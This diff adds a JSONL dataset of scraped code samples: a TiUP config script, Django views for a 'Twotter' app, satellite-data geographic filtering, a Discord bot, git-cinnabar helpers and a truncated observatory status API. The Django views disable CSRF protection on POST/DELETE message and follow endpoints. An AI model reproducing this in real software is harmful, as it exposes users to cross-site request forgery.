diff --git "a/1470.jsonl" "b/1470.jsonl" new file mode 100644--- /dev/null +++ "b/1470.jsonl" @@ -0,0 +1,1865 @@ +{"seq_id":"30230568471","text":"# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../../helper/python.helper')\nsys.path.append('../../helper/tiup.helper')\n\nfrom ticat import Env\nfrom strs import to_true\nfrom topology import TiUPYaml\n\ndef main():\n\tenv = Env()\n\tdepose_kvs = to_true(env.must_get('deploy.env.kvs.depose-after-deployed'))\n\n\tyaml = TiUPYaml(env, depose_kvs = depose_kvs)\n\ttext, path = yaml.save()\n\n\tenv.set('tidb.tiup.yaml', path)\n\tenv.flush()\n\n\tprint(text + '\\n')\n\tprint('tidb.tiup.yaml=' + path)\n\nmain()\n","repo_name":"ticat-mods/tidb.cluster","sub_path":"deploy/gen/tiup-yaml.py","file_name":"tiup-yaml.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"12243294230","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import login\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.template.loader import render_to_string\nfrom django.http import JsonResponse\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import User, Message, Follow, Twoot\nfrom .serializers import UserModelSerializer, MessageModelSerializer, FollowModelSerializer\n\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\nfrom rest_framework.authentication import SessionAuthentication\n\n\n# Create your views here.\ndef profile(request, username):\n try:\n user = User.objects.get(username=username);\n except:\n # in reality raise 404\n return render(request, 'twotter/dashboard.html')\n\n editPerms = False\n if request.user.is_authenticated and request.user == user:\n editPerms = True\n\n context = locals()\n return render(request, 'twotter/profile.html', context)\n\n\ndef dashboard(request):\n return render(request, 'twotter/dashboard.html')\n\n\n@login_required\ndef edit_profile(request, username):\n user = request.user\n form = CustomUserChangeForm(request.POST or None,\n initial={'first_name': user.first_name, 'last_name': user.last_name,\n 'email': user.email, 'status': user.status\n , 'user_img': user.user_img})\n if request.method == \"POST\":\n form = CustomUserChangeForm(request.POST, request.FILES)\n if form.is_valid():\n user.first_name = request.POST['first_name']\n user.last_name = request.POST['last_name']\n user.email = request.POST['email']\n user.status = request.POST['status']\n print(request.FILES)\n user.user_img = request.FILES['user_img']\n user.save()\n return redirect(reverse(\"profile\", args=[username]))\n return render(request, \"twotter/edit_profile.html\", {\"form\": form})\n\n\ndef signup(request):\n form = CustomUserCreationForm(request.POST or None, request.FILES)\n if request.method == \"POST\":\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(reverse(\"dashboard\"))\n\n return render(request, \"twotter/signup.html\", {\"form\": form})\n\n\ndef userlist(request):\n return render(request, \"twotter/userlist.html\")\n\n\ndef chat(request):\n return render(request, \"twotter/chat.html\")\n\n\n# API\nclass UserModelViewSet(ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserModelSerializer\n 
allowed_methods = ('GET', 'HEAD', 'OPTIONS')\n pagination_class = None\n\n def list(self, request, *args, **kwargs):\n self.queryset = self.queryset.exclude(username=request.user.username)\n target = self.request.query_params.get('target', None)\n if target is not None:\n self.queryset = self.queryset.filter(Q(username=target))\n serialized = UserModelSerializer(self.queryset, many=True)\n return Response(serialized.data)\n\n\nclass MessagePagination(PageNumberPagination):\n page_size = 20\n\n\nclass CsrfExemptAuthentication(SessionAuthentication):\n def enforce_csrf(self, request):\n return\n\n\nclass MessageModelViewSet(ModelViewSet):\n queryset = Message.objects.all()\n serializer_class = MessageModelSerializer\n allowed_methods = ('GET', 'POST', 'HEAD', 'OPTIONS')\n authentication_classes = (CsrfExemptAuthentication,)\n pagination_class = MessagePagination\n\n def list(self, request, *args, **kwargs):\n self.queryset = self.queryset.filter(Q(receiver=request.user) | Q(sender=request.user))\n target = self.request.query_params.get('target', None)\n if target is not None:\n self.queryset = self.queryset.filter(Q(receiver=request.user, sender__username=target) |\n Q(receiver__username=target, sender=request.user))\n serialized = MessageModelSerializer(self.queryset, many=True)\n return Response(serialized.data)\n\n def retrieve(self, request, *args, **kwargs):\n msg = get_object_or_404(\n self.queryset.filter(Q(receiver=request.user) | Q(sender=request.user), Q(pk=kwargs['pk']))\n )\n serialized = MessageModelSerializer(msg)\n return Response(serialized.data)\n\n\nclass FollowModelViewSet(ModelViewSet):\n queryset = Follow.objects.all()\n serializer_class = FollowModelSerializer\n allowed_methods = ('GET', 'POST', 'DELETE', 'HEAD', 'OPTIONS')\n authentication_classes = (CsrfExemptAuthentication,)\n pagination_class = MessagePagination\n\n def list(self, request, *args, **kwargs):\n target = self.request.query_params.get('target', None)\n req = self.request.query_params.get('req', None)\n if req is None:\n self.queryset = self.queryset.filter(Q(follower=request.user, subject__username=target))\n elif req == \"followers\":\n self.queryset = self.queryset.filter(Q(subject__username=target))\n elif req == \"following\":\n self.queryset = self.queryset.filter(Q(follower__username=target))\n\n serialized = FollowModelSerializer(self.queryset, many=True)\n return Response(serialized.data)\n\n\ndef twoot_list(request):\n twoots = Twoot.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'twoot/twoot_list.html', {'twoots': twoots})\n\n\ndef twoot_detail(request, pk):\n twoot = get_object_or_404(Twoot, pk=pk)\n is_liked = False\n if twoot.likes.filter(id=request.user.id).exists():\n is_liked = True\n return render(request, 'twoot/twoot_detail.html', {'twoot': twoot, 'is_liked': is_liked, 'total_likes': twoot.total_likes(), })\n\n\ndef like_twoot(request):\n twoot = get_object_or_404(Twoot, id=request.POST.get('id'))\n is_liked = False\n if twoot.likes.filter(id=request.user.id).exists():\n twoot.likes.remove(request.user)\n is_liked = False\n else:\n twoot.likes.add(request.user)\n is_liked = True\n context = {\n 'twoot': twoot,\n 'is_liked': is_liked,\n 'total_likes': twoot.total_likes(),\n }\n if request.is_ajax():\n html = render_to_string('twoot/likes.html', context, request=request)\n return JsonResponse({'form': 
html})","repo_name":"RZhang05/Twotter","sub_path":"twotter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29225533228","text":"import math\nimport os\nfrom datetime import datetime\n\nimport pandas\n\nBASE_URL = 'https://airsl2.gesdisc.eosdis.nasa.gov/data/Aqua_AIRS_Level2/AIRS2CCF.006/'\n\n\ndef normalize_latitude_arithmetic(latitude):\n if latitude < -90:\n return -90\n if latitude > 90:\n return 90\n\n return latitude\n\n\ndef normalize_longitude_arithmetic(longitude):\n if longitude < -180:\n return longitude % 180\n if longitude > 180:\n return -180 + (longitude % 180)\n\n return longitude\n\n\ndef includes_intl_date_line(min_lon, max_lon, include_prime_meridian) -> bool:\n if min_lon == -180 or max_lon == 180:\n return True\n lon_naively_contains_zero = (min_lon <= 0 <= max_lon)\n if ((lon_naively_contains_zero and include_prime_meridian) or\n (not lon_naively_contains_zero and not include_prime_meridian)):\n return False\n else:\n return True\n\n\ndef calculate_longitude_angle_in_degrees(min_lon, max_lon, include_prime_meridian) -> int:\n if min_lon > max_lon:\n # Swap min and max to simplify math\n _min_lon, max_lon = max_lon, min_lon\n\n if (min_lon <= 0 <= max_lon) and include_prime_meridian:\n return abs(min_lon) + max_lon\n\n antimeridian = includes_intl_date_line(min_lon, max_lon, include_prime_meridian)\n\n if antimeridian and (min_lon <= 0 <= max_lon) or include_prime_meridian:\n # Special meridian logic\n return (180 - max_lon) + abs(-180 - min_lon)\n else:\n # Regular meridian logic\n return abs(max_lon - min_lon)\n\n\ndef expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, degrees) \\\n -> (int, int, bool, int):\n \"\"\"\n Returns a tuple of expanded min and max longitude, whether the expanded area includes the prime meridian, and\n the final span of the expanded angle in degrees.\n \"\"\"\n if min_lon > max_lon:\n # Swap min and max to simplify math\n min_lon, max_lon = max_lon, min_lon\n original_span = calculate_longitude_angle_in_degrees(min_lon, max_lon, include_prime_meridian)\n\n # Handle trivial case where expanded angle is the whole globe\n if original_span + (degrees * 2) >= 360:\n return -180, 180, True, 360\n\n expanded_min_lon = normalize_longitude_arithmetic(min_lon - degrees)\n expanded_max_lon = normalize_longitude_arithmetic(max_lon + degrees)\n\n if expanded_min_lon > expanded_max_lon:\n # Swap min and max to simplify math\n expanded_min_lon, expanded_max_lon = expanded_max_lon, expanded_min_lon\n\n if not include_prime_meridian:\n # Does this expanded area now include the prime meridian?\n if 0 < min_lon <= degrees:\n include_prime_meridian = True\n elif max_lon < 0 and (degrees + max_lon >= 0):\n include_prime_meridian = True\n\n expanded_span = calculate_longitude_angle_in_degrees(expanded_min_lon, expanded_max_lon,\n include_prime_meridian)\n # Round to 0.001 for sake of this check\n original_span = round(original_span, 3)\n\n if not (expanded_span >= original_span):\n raise ValueError('Expanded span is smaller than original span. 
{} < {}'.format(expanded_span,\n original_span))\n expected_span = original_span + (degrees * 2)\n\n # Round to 0.001 for sake of this check\n expected_span = round(expected_span, 3)\n\n if expected_span > 360:\n expected_span = 360\n\n error_amount = abs(expected_span - expanded_span)\n\n if error_amount >= 0.002 and expanded_span < 360:\n raise ValueError(\n 'Expanded span is smaller than expected. Original {}, expanded to {}, expected {} (expansion angle {})'\n .format(original_span, expanded_span, expected_span, degrees))\n\n return expanded_min_lon, expanded_max_lon, include_prime_meridian, expanded_span\n\n\ndef calculate_lat_lon_filter_condition(data, min_lat, max_lat, min_lon, max_lon, include_prime_meridian,\n is_search_area):\n\n # Handle special logic for expanded search area\n if is_search_area:\n search_min_lat = normalize_latitude_arithmetic(min_lat - 10)\n search_max_lat = normalize_latitude_arithmetic(max_lat + 10)\n latitude_condition = (data.lat >= search_min_lat) & (data.lat <= search_max_lat)\n else:\n latitude_condition = (data.lat >= min_lat) & (data.lat <= max_lat)\n\n # include longitudes within the specified range considering whether or not the prime meridian is included\n lon_naively_contains_zero = (min_lon <= 0 <= max_lon)\n special_logic = not ((lon_naively_contains_zero and include_prime_meridian) or\n (not lon_naively_contains_zero and not include_prime_meridian))\n if special_logic:\n longitude_condition = (data.lon <= min_lon) | (data.lon >= max_lon)\n else:\n longitude_condition = (data.lon >= min_lon) & (data.lon <= max_lon)\n\n # Expand search area longitude further near the poles\n if is_search_area:\n # 1st tier, +/- 10 degrees at absolute latitude < 60\n expanded_min_lon, expanded_max_lon, includes_prime, span = \\\n expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, 10)\n lon_naively_contains_zero = (expanded_min_lon <= 0 <= expanded_max_lon)\n special_logic = not ((lon_naively_contains_zero and includes_prime) or\n (not lon_naively_contains_zero and not includes_prime))\n if special_logic:\n longitude_condition |= (\n ((data.lon <= expanded_min_lon)\n |\n (data.lon >= expanded_max_lon))\n &\n ((data.lat > -60) & (data.lat < 60))\n )\n else:\n longitude_condition |= (\n ((data.lon >= expanded_min_lon)\n &\n (data.lon <= expanded_max_lon))\n &\n ((data.lat > -60) & (data.lat < 60))\n )\n # 2nd tier, +/- 25 degrees at 60-70 absolute latitude\n expanded_min_lon, expanded_max_lon, includes_prime, span = \\\n expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, 25)\n lon_naively_contains_zero = (expanded_min_lon <= 0 <= expanded_max_lon)\n special_logic = not ((lon_naively_contains_zero and includes_prime) or\n (not lon_naively_contains_zero and not includes_prime))\n if special_logic:\n longitude_condition |= (\n ((data.lon <= expanded_min_lon)\n |\n (data.lon >= expanded_max_lon))\n &\n ((data.lat <= -60) | (data.lat >= 60))\n )\n else:\n longitude_condition |= (\n ((data.lon >= expanded_min_lon)\n &\n (data.lon <= expanded_max_lon))\n &\n ((data.lat <= -60) | (data.lat >= 60))\n )\n # 3rd tier, +/- 45 degrees at 70-80 absolute latitude\n expanded_min_lon, expanded_max_lon, includes_prime, span = \\\n expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, 45)\n lon_naively_contains_zero = (expanded_min_lon <= 0 <= expanded_max_lon)\n special_logic = not ((lon_naively_contains_zero and includes_prime) or\n (not lon_naively_contains_zero and not includes_prime))\n if special_logic:\n 
longitude_condition |= (\n ((data.lon <= expanded_min_lon)\n |\n (data.lon >= expanded_max_lon))\n &\n ((data.lat <= -70) | (data.lat >= 70))\n )\n else:\n longitude_condition |= (\n ((data.lon >= expanded_min_lon)\n &\n (data.lon <= expanded_max_lon))\n &\n ((data.lat <= -70) | (data.lat >= 70))\n )\n # 4th tier, all longitudes at absolute latitude > 80\n longitude_condition |= (\n ((data.lat <= -80) | (data.lat >= 80))\n )\n\n geo_condition = latitude_condition & longitude_condition\n\n return geo_condition\n\n\nclass AquaPositions(object):\n\n def get_hdf_urls(self, start_granule, end_granule, min_latitude, min_longitude, max_latitude, max_longitude,\n include_prime_meridian, gca_threshold, gca_is_max, test_hdf_output):\n min_year, max_year = start_granule.year, end_granule.year\n base_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), '..', 'data'))\n\n data_files = [\n os.path.join(base_dir, 'aqua_positions_%s.csv.zip' % year) for year in range(min_year, max_year + 1)\n ]\n\n data = pandas.concat(\n (pandas.read_csv(filename) for filename in data_files), sort=True\n )\n\n condition = calculate_lat_lon_filter_condition(data, min_latitude, max_latitude, min_longitude,\n max_longitude, include_prime_meridian,\n is_search_area=True)\n\n # granule times must be within the specified range - this can be calculated against the granule numbers\n if end_granule.granule_number >= start_granule.granule_number:\n condition &= (\n (data.granule >= start_granule.granule_number) & (data.granule <= end_granule.granule_number)\n )\n else:\n condition &= (\n ((data.granule >= start_granule.granule_number) | (data.granule <= end_granule.granule_number))\n )\n\n # check if granule was captured within min/max specified solar GCA\n if gca_is_max:\n condition &= (data.GCA <= gca_threshold)\n else:\n condition &= (data.GCA >= gca_threshold)\n\n # granule dates must be within the specified range\n data['date_value'] = data.year * 1000 + data.day # same value as in Granule\n condition &= ((data.date_value >= start_granule.date_value) & (data.date_value <= end_granule.date_value))\n\n data = data[condition]\n\n if test_hdf_output:\n return data\n\n return (self.get_url(filename) for filename in data.hdf_filename)\n\n @staticmethod\n def get_url(filename):\n # AIRS.2002.08.30.225.L2.CC.v6.0.7.0.G13201091521.hdf\n year, month, day, granule_number = map(int, filename.split('.')[1:5])\n\n day_of_year = datetime.strftime(datetime(year, month, day), '%j')\n # add leading zeros\n if len(day_of_year) == 2:\n day_of_year = '0' + day_of_year\n elif len(day_of_year) == 1:\n day_of_year = '00' + day_of_year\n return '%s/%s/%s/%s' % (BASE_URL, year, day_of_year, filename)\n","repo_name":"rentcp/Heatwave","sub_path":"classes/aqua_positions.py","file_name":"aqua_positions.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"43244987398","text":"import discord\nfrom discord.ext import commands\nfrom discord_slash import SlashCommand, SlashContext\nfrom discord_slash.utils.manage_commands import create_option\nimport logging\nimport requests as r\nfrom datetime import datetime, timezone, timedelta\nfrom json import loads\nfrom modules.teachers.teachers import Monika\nfrom modules.music.player import Player\nfrom modules.pipa.pipa import Hostinsky\nfrom modules.countdown import Countdown\nfrom modules.now_maturuje.now_maturuje import Displayer\nimport os\nfrom os.path import join, dirname\nfrom dotenv import 
load_dotenv\n\ndebug = False\n\nDELETE_TIME = 20.0\nADMIN = 470490558713036801\ntzone = timezone(timedelta(hours=-2))\n\nif debug:\n logging.basicConfig(level=logging.DEBUG)\nelse:\n logging.basicConfig(level=logging.INFO)\n\nbot = commands.Bot(command_prefix=\"-\", owner_id=ADMIN, intents=discord.Intents.all())\nslash = SlashCommand(bot, sync_commands=True)\n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\nTOKEN = os.environ.get(\"TOKEN\")\n\n\n@bot.command(name=\"nick\")\n@commands.guild_only()\nasync def change_nick(ctx: commands.Context, target: discord.Member, *, nick: str = None):\n \"\"\"změní nick zadanému hráčovi\"\"\"\n nick = nick.strip()\n if len(nick) > 32:\n await ctx.send(\"Přezdívka může mít maximálně 32 charakterů\", delete_after=DELETE_TIME)\n return\n before = target.display_name\n try:\n await target.edit(nick=nick, reason=\"Změnil {0.author.name} v kanálu {0.channel.name}\".format(ctx))\n except discord.Forbidden:\n await ctx.send(\"Nemám právo měnit tuto přezdívku\")\n else:\n await ctx.send(\"Změněno z '{0}' na '{1}' uživatelem `{2}`\".format(before, nick, ctx.author.name))\n return\n\n\n@bot.command(name=\"among\")\nasync def among_get_active(ctx: commands.Context):\n \"\"\"Vypíše počet aktivních Among Us hráčů na Steamu\"\"\"\n url = \"https://api.steampowered.com/ISteamUserStats/GetNumberOfCurrentPlayers/v1/?format=json&appid=945360\"\n info = r.get(url)\n if info.status_code != 200:\n await ctx.send(\"Chyba při získávání informací od Steamu\", delete_after=DELETE_TIME)\n return\n info = loads(info.text)\n stats = info[\"response\"]\n embed = discord.Embed(title=\"Among Us\", colour=discord.Colour.from_rgb(197, 17, 17), timestamp=datetime.now(tz=tzone))\n embed.set_thumbnail(url=\"https://cdn.akamai.steamstatic.com/steam/apps/945360/header.jpg?t=1619622456\")\n embed.description = \"{0} aktivních hráčů\".format(stats[\"player_count\"])\n await ctx.send(embed=embed)\n return\n\n\n@bot.command(name=\"ping\")\nasync def pong(ctx: commands.Context):\n await ctx.send(\"Pong \" + str(int(bot.latency * 1000)) + \"ms\")\n\n\n@bot.command(name=\"abcdefg\", hidden=True)\nasync def placeholder(ctx: commands.Context):\n await ctx.send(\"%placeholder%\")\n\n\n@bot.command(name=\"exit\", hidden=True)\n@commands.is_owner()\nasync def shutdown(ctx: commands.Context):\n await ctx.send(\"Jdu spát\")\n for guild in bot.guilds:\n if guild.voice_client:\n await guild.voice_client.disconnect()\n await bot.close()\n exit(0)\n\n\n@bot.command(name=\"source\", aliases=[\"src\"])\nasync def print_source(ctx: commands.Context):\n \"\"\"Odkaz na zdrojový kód bota\"\"\"\n await ctx.send(\"https://github.com/stepech/DCBot\")\n\n\n@bot.event\nasync def on_ready():\n logging.info(\"I'm ready! 
{0.name}\".format(bot.user))\n for guild in await bot.fetch_guilds().flatten():\n logging.info(\"Connected to {0}\".format(guild.name))\n\n admin: discord.User = await bot.fetch_user(bot.owner_id)\n logging.info(\"Owner is: {0}\".format(admin.name))\n logging.info(\"---------\")\n logging.info(\"°°Ready°°\")\n\n\n@bot.event\nasync def on_member_update(before: discord.Member, after: discord.Member):\n if bot.get_guild(498423239119208448).get_role(770453970165694545) not in before.roles:\n return\n role: discord.Role = bot.get_guild(498423239119208448).get_role(827625682833637389)\n try:\n if before.status == discord.Status.offline and after.status is not before.status:\n await after.add_roles(role, reason=\"Viditelný status\")\n elif before.status != after.status and after.status == discord.Status.offline:\n await after.remove_roles(role, reason=\"Je offline/neviditelný\")\n except discord.NotFound:\n pass\n\n\n@bot.event\nasync def on_command_error(ctx: commands.Context, exc: commands.CommandError):\n if isinstance(exc, commands.MemberNotFound):\n await ctx.send(\"Uživatel nebyl nalezen\")\n elif isinstance(exc, commands.MissingRequiredArgument):\n await ctx.send(\"Špatné formátování příkazu. Nedodány veškeré argumenty\")\n elif isinstance(exc, commands.CommandNotFound):\n pass\n elif isinstance(exc, commands.NoPrivateMessage):\n await ctx.send(\"Nelze použít v soukromém chatu\")\n elif isinstance(exc, commands.CheckFailure):\n pass\n else:\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n await ctx.send(\"<@\" + str(470490558713036801) + \">, chyba\")\n raise exc\n\n\n@slash.slash(name=\"ping\", description=\"Pong\")\nasync def _ping(ctx: SlashContext):\n await pong(ctx)\n\n\n@slash.slash(name=\"among\", description=\"Aktivní počet Among Us hráčů na Steamu\")\nasync def _among(ctx: SlashContext):\n await among_get_active(ctx)\n\n\n@slash.slash(name=\"nick\", description=\"Změní nick uživateli\",\n options=[create_option(name=\"user\",\n description=\"Cíl kterému měníš přezdívku\",\n option_type=6,\n required=True),\n create_option(name=\"nick\",\n description=\"nová přezdívka\",\n option_type=3,\n required=False)])\nasync def _nick(ctx: SlashContext, user, nick=None):\n await change_nick(ctx, target=user, nick=nick)\n\n\n@slash.slash(name=\"exit\", description=\"Vypne bota, může použít jen stepech\")\n@commands.is_owner()\nasync def _shutdown(ctx: SlashContext):\n await shutdown(ctx)\n\n\n@slash.slash(name=\"source\", description=\"Odkaz na zdrojový kód bota\")\nasync def _print_source(ctx: SlashContext):\n await print_source(ctx)\n\n\nbot.add_cog(Countdown(bot))\nbot.add_cog(Monika(bot))\n#bot.add_cog(Player(bot))\nbot.add_cog(Hostinsky(bot))\nbot.add_cog(Displayer(bot))\nbot.run(TOKEN)\n","repo_name":"vidmartin/DCBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32035666002","text":"#coding: utf-8\n\nimport numpy as np\nimport os\nimport pickle\nimport pandas as pd\nfrom params import seed_nb\nimport pickle\n\nfrom utils import argmax_m\n\ndef compute_gaps(mu_p, N):\n K, M = mu_p.shape\n S_star, mu_star = argmax_m(mu_p, N+1)\n S_star = [S_star[m][:-1] for m in range(M)]\n mu_m = [mu_star[m][-2] for m in range(M)]\n mu_m1 = [mu_star[m][-1] for m in range(M)]\n gaps = np.matrix(np.zeros((K,M)))\n for m in range(M):\n for k in range(K):\n if (k in S_star[m]):\n gaps[k,m] = mu_p[k,m]-mu_m1[m]\n else:\n gaps[k,m] = mu_m[m]-mu_p[k,m]\n 
return gaps, S_star\n\ndef create_save_instances(ninstances,data_params,name,folder=\"\"):\n data_type, K, M, N_ = [data_params[a] for a in [\"data_type\", \"K\",\"M\",\"N\"]]\n instances_fname = folder+name+\".pck\"\n if (not os.path.exists(instances_fname)):\n instances = {}\n for nid in range(ninstances):\n W, mu, S_star, gaps = eval(data_type+\"_instance\")(K,M,N_,data_params[\"delta_min\"],data_params[\"alpha\"])\n K, M = mu.shape\n instances.setdefault(nid, {'W': W, 'S_star': S_star, \"mu\": mu, \"gaps\": gaps})\n with open(instances_fname, \"wb\") as f:\n pickle.dump(instances, f)\n with open(instances_fname, \"rb\") as f:\n instances = pickle.load(f)\n alpha = data_params[\"alpha\"]\n if ((alpha >= 0) and (data_type in [\"personalizedsynthetic\"])):\n for nid,NI in enumerate(instances):\n mu = instances[NI][\"mu\"]\n M = mu.shape[1]\n W = alpha*np.matrix(np.eye(M))+((1-alpha)/M)*np.matrix(np.ones((M,M)))\n gaps, S_star = compute_gaps(mu.dot(W), N_)\n instances[NI] = {\"W\":W, \"S_star\": S_star, \"mu\": mu, \"gaps\": gaps}\n return instances\n\ndef personalizedsynthetic_instance(K,M,N,delta_min,alpha):\n ## Weight matrix\n if (M==1):\n W = np.matrix([[1.]])\n else:\n W = np.matrix(((1-alpha)/M)*np.ones((M,M))+alpha*np.eye(M))\n assert (np.isclose(np.sum(W,axis=0),1)).all()\n while True:\n mu = np.matrix(np.random.normal(0,1,(K,M))).reshape((K,M))\n mu /= np.linalg.norm(mu,None)\n gaps, S_star = compute_gaps(mu.dot(W), N)\n delta_min_ = np.min(gaps)\n if ((delta_min_>=delta_min) and (delta_min_>0)):\n break\n return W, mu, S_star, gaps\n\n#' @param K number of arms\n#' @param M number of agents\n#' @param delta_min minimum value of gap\n#' @param alpha personalization degree\n#' @return W, mu, k_star, gaps\ndef synthetic_instance(K,M,N,delta_min,alpha=None):\n ## Weight matrix\n if (M==1):\n W = np.matrix([[1.]])\n else:\n alpha_ = np.random.choice([i*0.1 for i in range(0, 11, 1)],M)\n W = np.matrix(np.ones((M,M)))\n for m in range(M):\n W[:,m] = (1-alpha_[m])/M*W[:,m]\n np.fill_diagonal(W,alpha_+(1-alpha_)/M)\n assert (np.isclose(np.sum(W,axis=0),1)).all()\n while True:\n mu = np.matrix(np.random.normal(0,1,(K,M))).reshape((K,M))\n mu /= np.linalg.norm(mu,None)\n mu_p = mu.dot(W)\n gaps, S_star = compute_gaps(mu_p, N)\n delta_min_ = np.min(gaps)\n if ((delta_min_>=delta_min) and (delta_min_>0)):\n break\n return W, mu, S_star, gaps\n","repo_name":"clreda/near-optimal-federated","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25098389972","text":"from __future__ import absolute_import, print_function, unicode_literals\nimport argparse\nimport os\nimport sys\nfrom cinnabar.helper import helper_hash, tree_hash\nfrom cinnabar import VERSION\n\n\nclass CLI(object):\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(title='subcommands', dest='command')\n\n @staticmethod\n def argument(*args, **kwargs):\n def decorator(func):\n if not hasattr(func, 'cli_arguments'):\n func.cli_arguments = []\n func.cli_arguments.append((args, kwargs))\n return func\n return decorator\n\n @staticmethod\n def subcommand(func):\n subparser = CLI.subparsers.add_parser(func.__name__, help=func.__doc__)\n if hasattr(func, 'cli_arguments'):\n # Because argparse.REMAINDER can't be used as first argument\n # without making flags emit a \"unrecognized argument\" error,\n # treat that specially.\n if len(func.cli_arguments) == 1:\n args, kwargs = 
func.cli_arguments[0]\n if kwargs.get('nargs') == argparse.REMAINDER:\n func.cli_remainder = args[0]\n func.cli_arguments = ()\n for args, kwargs in reversed(func.cli_arguments):\n subparser.add_argument(*args, **kwargs)\n del func.cli_arguments\n subparser.set_defaults(callback=func)\n\n @staticmethod\n def prepare(argv):\n CLI.parser.add_argument('--version', action=Version)\n\n args, leftovers = CLI.parser.parse_known_args(argv)\n\n if not hasattr(args, 'callback'):\n CLI.parser.print_help()\n CLI.parser.exit()\n\n if hasattr(args.callback, 'cli_remainder'):\n args = argparse.Namespace(**{\n 'callback': args.callback,\n args.callback.cli_remainder: leftovers,\n })\n else:\n args = CLI.parser.parse_args(argv)\n return (args.callback, args)\n\n\ndef iter_modules_in_path(path):\n base = os.path.abspath(os.path.normcase(path)) + os.sep\n for name, module in sys.modules.items():\n if not hasattr(module, '__file__'):\n continue\n\n path = module.__file__\n if not path:\n continue\n\n if path.endswith('.pyc'):\n path = path[:-1]\n path = os.path.abspath(os.path.normcase(path))\n\n if path.startswith(base):\n yield os.path.relpath(path, base).encode('ascii')\n\n\nclass Version(argparse.Action):\n def __init__(self, option_strings, dest=argparse.SUPPRESS,\n default=argparse.SUPPRESS,\n help=\"show program's version number and exit\"):\n super(Version, self).__init__(\n option_strings=option_strings, dest=dest, default=default,\n nargs='?', choices=('cinnabar', 'module', 'helper'),\n help=help)\n\n @staticmethod\n def cinnabar_version():\n return VERSION\n\n @staticmethod\n def module_version():\n # Import the remote_helper module, that is not imported by\n # git-cinnabar\n import cinnabar.remote_helper\n # Import the bdiff module, that is only imported if mercurial is\n # not installed\n import cinnabar.bdiff\n cinnabar_path = os.path.dirname(cinnabar.__file__)\n v = tree_hash(iter_modules_in_path(cinnabar_path), cinnabar_path)\n return v.decode('ascii')\n\n @staticmethod\n def helper_version():\n from cinnabar.helper import GitHgHelper\n try:\n with GitHgHelper.query(b'revision') as out:\n version = out.read(40).decode('ascii')\n except Exception:\n version = 'unknown'\n\n sha1 = (helper_hash() or 'unknown').decode('ascii')\n return version, sha1\n\n def __call__(self, parser, namespace, values, option_string=None):\n if values == 'cinnabar' or not values:\n print(self.cinnabar_version())\n if values == 'module' or not values:\n sha1 = self.module_version()\n if not values:\n print('module-hash:', sha1)\n else:\n print(sha1)\n if values == 'helper' or not values:\n version, sha1 = self.helper_version()\n if version != sha1:\n sha1 = '%s/%s' % (version, sha1)\n if not values:\n print('helper-hash:', sha1)\n else:\n print(sha1)\n\n parser.exit()\n","repo_name":"sergeykish/git-cinnabar","sub_path":"cinnabar/cmd/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"73648238242","text":"import instrument\nimport nires\nimport hires\nimport deimos\nimport lris\nimport kcwi\nimport nirc2\nimport nirspec\nimport osiris\nimport esi\nimport mosfire\nimport weather\nimport json\nimport db_conn\n\nfrom flask import Flask, render_template, request, redirect, url_for, session\n\nimport logging\nlog = logging.getLogger('koaapi')\n\n\n# Create a dictionary of the instrument Constructors\nINSTRUMENTS = {\n 'deimos':deimos.Deimos,\n 'esi':esi.Esi,\n 'hires':hires.Hires,\n 'kcwi':kcwi.Kcwi,\n 
'lris':lris.Lris,\n 'mosfire':mosfire.Mosfire,\n 'nirc2':nirc2.Nirc2,\n 'nires':nires.Nires,\n 'nirspec':nirspec.Nirspec,\n 'osiris':osiris.Osiris,\n 'weather':weather.Weather\n }\n\n\ndef tpx_status(dev=False):\n '''\n Method to update the transfer status of koa data\n\n Arguments for the update will be passed via GET or POST\n instr: the instrument that created the data\n @type instr: string\n date: the utdate the instrument took the data\n @type date: string\n statusType: the type of file transfered\n @type statusType: string\n status: the status of the ingestion from IPAC\n @type status: string\n '''\n # get the arguments passed as a get or post\n args = request.args\n instr = args['instr'].lower()\n date = args['date']\n statusType = args['statusType']\n status = args['status']\n statusMessage = args.get('statusMessage', 'NULL')\n response = ''\n # change dev here for testonly paramater\n try:\n if args['testonly'].lower() == 'true': dev=True\n except:\n pass\n\n # Create the instrument subclass object based on instr \n try:\n # Here we create our instrumentStatus object that will handle any differences between instruments\n # INSTRUMENTS is the dictionary of instrument constructors\n instrumentStatus = INSTRUMENTS[instr](instr, date, statusType, status, statusMessage, dev)\n except Exception as e:\n log.error('error creating the object: ' + str(e))\n response = {'APIStatus':'ERROR', 'Message':f\"error creating the object for '{instr}'\"}\n else:\n 